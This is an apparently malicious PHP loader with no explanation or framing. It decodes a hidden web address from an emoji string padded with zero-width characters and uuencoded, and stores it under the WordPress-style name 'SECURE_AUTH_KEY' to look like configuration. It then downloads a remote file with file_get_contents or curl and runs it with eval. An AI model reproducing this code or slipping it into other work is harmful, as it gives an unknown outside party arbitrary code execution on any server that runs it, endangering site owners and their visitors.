<?php
$zwsp=hex2bin('E2808B');$zwnj=hex2bin('E2808C');$zwj=hex2bin('E2808D');$wj=hex2bin('E281A0');$bom=hex2bin('EFBBBF');
$P='ðŸ˜‡'.$wj.'ðŸ™ƒ'.$zwsp.'ðŸ˜'.$zwj.'ðŸ¤£ðŸ˜œ'.$wj.'ðŸ˜ŒðŸ˜'.$zwsp.'ðŸ˜…ðŸ¤¨ðŸ˜†'.$wj.'ðŸ˜›ðŸ¤“ðŸ˜ðŸ˜'.$zwnj.'ðŸ˜„ðŸ˜ŠðŸ˜‹ðŸ˜‰ðŸ™‚'.$wj.'ðŸ¤“ðŸ˜™ðŸ™ƒðŸ˜ðŸ˜Š'.$zwj.'ðŸ¥°ðŸ˜†ðŸ˜˜ðŸ˜‚ðŸ˜šðŸ˜‰'.$zwsp.'ðŸ§ðŸ˜´ðŸ˜€ðŸ˜´';
$P=str_replace([$zwsp,$zwnj,$zwj,$wj,$bom],'',$P);
$m=['ðŸ˜‡'=>'7','ðŸ™ƒ'=>':','ðŸ˜'=>"'",'ðŸ¤£'=>'1','ðŸ˜œ'=>'T','ðŸ˜Œ'=>'<','ðŸ˜…'=>',','ðŸ¤¨'=>'Z','ðŸ˜†'=>'+','ðŸ˜›'=>'R','ðŸ¤“'=>']','ðŸ˜'=>'S','ðŸ˜'=>'=','ðŸ˜„'=>'&','ðŸ˜Š'=>'5','ðŸ˜‹'=>'P','ðŸ˜‰'=>';','ðŸ™‚'=>'6','ðŸ˜™'=>'M','ðŸ¥°'=>'B','ðŸ˜˜'=>'F','ðŸ˜‚'=>'-','ðŸ˜š'=>'O','ðŸ§'=>'2','ðŸ˜´'=>'`','ðŸ˜€'=>"\n"];
$uu=strtr($P,$m);
$base=trim(convert_uudecode($uu));
if($base==='')exit;
if(substr($base,-1)!=='/')$base.='/';
define('SECURE_AUTH_KEY',$base.'3.txt');
$code=false;
if(ini_get('allow_url_fopen')){
  $ctx=stream_context_create(['http'=>['timeout'=>10,'user_agent'=>'Mozilla/5.0'],'ssl'=>['verify_peer'=>true,'verify_peer_name'=>true,'allow_self_signed'=>false]]);
  $code=@file_get_contents(SECURE_AUTH_KEY,false,$ctx);
}
if($code===false&&function_exists('curl_init')){
  $ch=curl_init(SECURE_AUTH_KEY);
  $opt=[CURLOPT_RETURNTRANSFER=>true,CURLOPT_FOLLOWLOCATION=>true,CURLOPT_TIMEOUT=>10,CURLOPT_USERAGENT=>'Mozilla/5.0',CURLOPT_SSL_VERIFYPEER=>true,CURLOPT_SSL_VERIFYHOST=>2];
  if(defined('CURL_IPRESOLVE_V4'))$opt[CURLOPT_IPRESOLVE]=CURL_IPRESOLVE_V4;
  curl_setopt_array($ch,$opt);$resp=curl_exec($ch);$ok=$resp!==false&&curl_getinfo($ch,CURLINFO_HTTP_CODE)===200;curl_close($ch);if($ok)$code=$resp;
}
if($code===false)exit;
if(strncmp($code,"\xEF\xBB\xBF",3)===0)$code=substr($code,3);
eval('?>'.$code);
